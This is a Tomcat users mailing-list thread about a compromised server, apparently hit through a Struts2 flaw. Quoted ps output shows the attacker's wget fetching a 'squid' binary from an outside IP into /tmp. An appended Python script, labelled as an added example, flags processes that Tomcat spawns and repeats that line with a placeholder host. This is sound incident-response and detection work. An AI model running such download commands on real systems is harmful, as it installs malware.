Hello Martin/Felix,

I'm uploading my logfiles so they will be available when the upload is finished.

Regarding the configuration, it's working in two other sites without
problem, and there is no problem putting L4 balancing with haproxy.

I have asked developers about that exploit, still without answer.

I will let you know how things are going, thanks for all =)

Regards/Saludos!

BTW: Martin, thanks for your Spanish words!!!! Really appreciated =)

Saludos.-
Leonardo Santagostini

<http://ar.linkedin.com/in/santagostini>





2014-04-30 13:20 GMT-03:00 Felix Schumacher <
felix.schumac...@internetallee.de>:

>
>
> On 30. April 2014 17:35:52 MESZ, Leonardo Santagostini <
> lsantagost...@gmail.com> wrote:
> >Hello list,
> >
> >Well, my homework is done
> >
> >Here are the links:
> >
> >setenv.sh: http://pastebin.com/EN1mXDFi
> >catalina.sh: http://pastebin.com/1vRVLbSm
> >web.xml: http://pastebin.com/BqEfiXXm
> >server.xml: http://pastebin.com/wfzE8bYU
> >logging.properties: http://pastebin.com/Qurk8sLU
> >catalina.properties: http://pastebin.com/jkfY1ZRQ
> >tree + logsfiles: http://pastebin.com/j3tip4ij
>
> From the logfiles it looks like you have struts2 applications. It might be
> that you are hit by a security problem within struts2 (Konstantin
> forwarded a warning a few days ago
> http://tomcat.10.x6.nabble.com/Fwd-ANN-Struts-2-up-to-2-3-16-1-Zero-Day-Exploit-Mitigation-security-critical-td5016578.html).
>
> >
> >Note that logsfiles are not the logfiles themselves but only an ls -lah
> >(just for you to see the log sizes)
> >
> >A little more about the infrastructure I've set up; I'll do some ASCII
> >art.
> >
> >
> >internet ---> FW -->nat-->Haproxy (1)-->Apache(2)--> mod_jk
> >(3)-->Haproxy(4)--> Tomcat7(5) --> haproxy(6) --Tomcat(7)
>
> That seems a bit too complex. In my eyes you need no haproxy between httpd
> and tomcat when you use mod_jk.
>
> Regards
>  Felix
> >
> >
> >Apache(2) is serving static content, so haproxy(1) at the first level
> >does http round-robin balancing.
> >Apache(2) connects to tomcat(5) through haproxy(4) (using an L4
> >connection) using mod_jk(3).
> >Tomcat(5) are the main app servers (the ones that got intruded), which use
> >tomcat(7) (Solr service) through haproxy(6) using an L4 connection.
> >
> >Versions:
> >
> >Apache: 2.2.17
> >mod_jk: 1.2.31
> >haproxy: 1.4.22
> >Tomcat: 7.0.53
> >Java: 1.6.0.41
> >
> >[root@arcbaappvrt05 tomcat]# /usr/java/default/bin/java -version
> >java version "1.6.0_41"
> >Java(TM) SE Runtime Environment (build 1.6.0_41-b02)
> >Java HotSpot(TM) 64-Bit Server VM (build 20.14-b01, mixed mode)
> >
> >OS: CentOS 5.8 64 bit
> >
> >[root@arcbaappvrt05 tomcat]# uname -a
> >Linux arcbaappvrt05.tic.yellargentina.com 2.6.18-308.el5 #1 SMP Tue Feb
> >21
> >20:06:06 EST 2012 x86_64 x86_64 x86_64 GNU/Linux
> >[root@arcbaappvrt05 tomcat]# cat /etc/redhat-release
> >CentOS release 5.8 (Final)
> >[root@arcbaappvrt05 tomcat]#
> >
> >For now I haven't seen that the squid process was launched, so I couldn't
> >do a dump.
> >
> >Let me know if you need more information.
> >
> >BTW, pastebin links will work for one week.
> >
> >Kind regards, yours
> >
> >
> >
> >
> >Saludos.-
> >Leonardo Santagostini
> >
> ><http://ar.linkedin.com/in/santagostini>
> >
> >
> >
> >
> >
> >2014-04-30 11:09 GMT-03:00 Leonardo Santagostini
> ><lsantagost...@gmail.com>:
> >
> >> OK, I will do the following:
> >>
> >> 1) thread dump of running tomcat instance
> >> 2) Pastebin the running tomcat config
> >>
> >> I think by midday I will have all the info.
> >>
> >> Thanks all for replying to me and for all the responses.
> >>
> >> Regards, Leonardo
> >>
> >> Saludos.-
> >> Leonardo Santagostini
> >>
> >> <http://ar.linkedin.com/in/santagostini>
> >>
> >>
> >>
> >>
> >>
> >> 2014-04-30 10:55 GMT-03:00 Christopher Schultz <
> >> ch...@christopherschultz.net>:
> >>
> >>>
> >>> Konstantin,
> >>>
> >>> On 4/29/14, 4:54 PM, Konstantin Kolinko wrote:
> >>> > 2014-04-30 0:41 GMT+04:00 Leonardo Santagostini
> >>> > <lsantagost...@gmail.com>:
> >>> >> Hello Dan,
> >>> >>
> >>> >> Nope, the attacker is executing the following locally
> >>> >>
> >>> >> tomcat    8882     1  0 Apr27 ?        00:00:00 sh /tmp/4.sh
> >>> >> tomcat    8893  8882  0 Apr27 ?        00:00:00 wget
> >>> >> http://218.199.102.59/.xy/squid32 -O /tmp/squid
> >>> >>
> >>> >> And then launches squid, which tries to connect via ssh to various
> >>> >> places.
> >>> >>
> >>> >> Right now it's time to leave the office, but in a few hours I will
> >>> >> paste to pastebin access logs, config files, whatever you tell
> >>> >> me.
> >>> >>
> >>> >> This is my pstree
> >>> >>
> >>> >> [root@arcbaappvrt05 apache-tomcat-7.0.53]# pstree
> >>> >> init─┬─atd
> >>> >>      ├─java─┬─sh───wget
> >>> >>      │      └─263*[{java}]
> >>> >
> >>> > sh launched by tomcat's java?
> >>>
> >>> Yes: please verify that it's the JVM running Tomcat, and not just any
> >>> JVM process.
> >>>
> >>> > Take a thread dump:
> >>> >
> >>> > https://wiki.apache.org/tomcat/HowTo#How_do_I_obtain_a_thread_dump_of_my_running_webapp_.3F
> >>> >
> >>> > It shall show the stack trace in the thread that launched the external
> >>> > process.
> >>>
> >>> +1
> >>>
> >>> The only things that ship with Tomcat that call Process.exec() are the
> >>> CGI servlet and SSI, both of which are disabled by default. So, either
> >>> you have an insecure CGI/SSI configuration, your web application has a
> >>> vulnerability, or you have deployed something like the Manager
> >>> application and improperly secured it.
> >>>
> >>> A classic example of such an intrusion might be that someone got a
> >>> foothold elsewhere into your network, and the Manager web application
> >>> is not properly secured with a password, etc.
> >>>
> >>> - -chris
> >>>
> >>>
> >>> ---------------------------------------------------------------------
> >>> To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
> >>> For additional commands, e-mail: users-h...@tomcat.apache.org
> >>>
> >>>
> >>
>
>
>
>
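Chris's and Konstantin's advice above (confirm that the sh/wget really hang off the JVM running Tomcat and not just any JVM, then thread-dump that JVM) as a small detector over `ps` output. This is an added example, not code from anyone in the thread; the ps snapshot is constructed to mirror the thread's ps/pstree lines, and the download host in it is a placeholder.

```python
# Main class of Tomcat's launcher (what catalina.sh starts); it tells the
# Tomcat JVM apart from any other java process on the host.
TOMCAT_MAIN = "org.apache.catalina.startup.Bootstrap"

# Constructed `ps -eo pid,ppid,user,args` snapshot modelled on the thread's
# ps/pstree output; the download host is a placeholder, not a real indicator.
SAMPLE_PS = """\
  PID  PPID USER     COMMAND
    1     0 root     /sbin/init
  512     1 root     /usr/sbin/atd
 4311     1 tomcat   /usr/java/default/bin/java -classpath /opt/tomcat/bin/bootstrap.jar org.apache.catalina.startup.Bootstrap start
 8882  4311 tomcat   sh /tmp/4.sh
 8893  8882 tomcat   wget http://ATTACKER-HOST-PLACEHOLDER/.xy/squid32 -O /tmp/squid
 9001     1 jenkins  /usr/bin/java -jar /opt/jenkins.war
 9010  9001 jenkins  sh -c git fetch
"""

def parse_ps(text):
    """Parse ps output (header line first) into {pid: (ppid, user, args)}."""
    procs = {}
    for line in text.splitlines()[1:]:
        pid, ppid, user, args = line.split(None, 3)
        procs[int(pid)] = (int(ppid), user, args)
    return procs

def tomcat_ancestor(procs, pid):
    """Walk the parent chain from pid; return the Tomcat JVM's pid, or None."""
    seen = set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        if TOMCAT_MAIN in procs[pid][2]:
            return pid
        pid = procs[pid][0]
    return None

def find_tomcat_children(procs):
    """Processes descended from the Tomcat JVM as (pid, jvm_pid, args).
    Stock Tomcat spawns processes only via the CGI servlet and SSI (both off
    by default), so every hit needs explaining; children of other JVMs
    (the jenkins sh in the sample) are deliberately not reported."""
    hits = []
    for pid, (ppid, _user, args) in procs.items():
        if TOMCAT_MAIN in args:
            continue
        jvm = tomcat_ancestor(procs, ppid)
        if jvm is not None:
            hits.append((pid, jvm, args))
    return sorted(hits)
```

Feed it real `ps -eo pid,ppid,user,args` output in place of SAMPLE_PS; the jvm_pid in each hit is the process to send `kill -3` to for the thread dump the wiki link above describes.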
